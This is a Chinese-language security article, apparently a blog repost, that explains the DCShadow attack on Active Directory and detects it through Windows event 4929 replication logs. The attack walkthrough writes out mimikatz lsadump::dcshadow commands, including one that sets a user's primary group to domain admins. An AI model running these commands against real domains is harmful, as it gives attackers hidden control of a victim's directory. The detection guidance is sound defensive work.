基于AD Event日志识别DCShadow攻击

admin 2022年10月8日11:59:29评论28 views字数 830阅读2分46秒阅读模式

01、简介

DCShadow攻击,是攻击者在获取到域管理员权限后,通过将沦陷的主机伪造成域控,将预先设定的对象或对象属性复制到正在运行的域控服务器中。

DCSync&DCShadow区别在于,DCSync是从域服务器将数据复制出来,而DCShadow是将伪造的数据复制到域服务器。

02、攻击过程示例

假设我们已经拿到了某台服务器SYSTEM权限,并从沦陷的服务器中获取到了域管理员的账号密码。

第一步:使用system权限更改数据

基于AD Event日志识别DCShadow攻击

在获取到system权限后,尝试更改域用户test的属性描述。

lsadump::dcshadow /object:CN=test,CN=Users,DC=evil,DC=com /attribute:description /value:test

基于AD Event日志识别DCShadow攻击

第二步:使用域管理权限执行域数据同步

基于AD Event日志识别DCShadow攻击

切换到域管理员权限,使用mimikatz进行域数据同步。

mimikatz.exe "lsadump::dcshadow  /push"  exit

基于AD Event日志识别DCShadow攻击

第三步:在AD域控,我们看到了test用户描述已经被修改。

基于AD Event日志识别DCShadow攻击

重复以上步骤,我们可以使用下面的方法,修改组id从而将用户改为域管:

lsadump::dcshadow /object:CN=test,CN=Users,DC=evil,DC=com /attribute:primarygroupid  /value:512

03、 DCShadow攻击检测

在域控组策略中开启审核策略,审核目录服务访问(成功和失败),来记录所有的目录服务访问事件。

基于AD Event日志识别DCShadow攻击

在Windows安全日志,EventCode:4929,可以看到源地址:WIN-CIFJV1AK3T6.evil.com发起详细的目录服务复制事件,排除生产域控服务器的主机列表,很容易可以辨别出伪造的域控服务器。

基于AD Event日志识别DCShadow攻击

我们可以根据AD Event日志提取关键特征,通过监视源地址字段,从而可以实时监测DCShadow攻击。

基于AD Event日志识别DCShadow攻击

原文始发于微信公众号(Bypass):基于AD Event日志识别DCShadow攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月8日11:59:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   基于AD Event日志识别DCShadow攻击https://cn-sec.com/archives/1336287.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息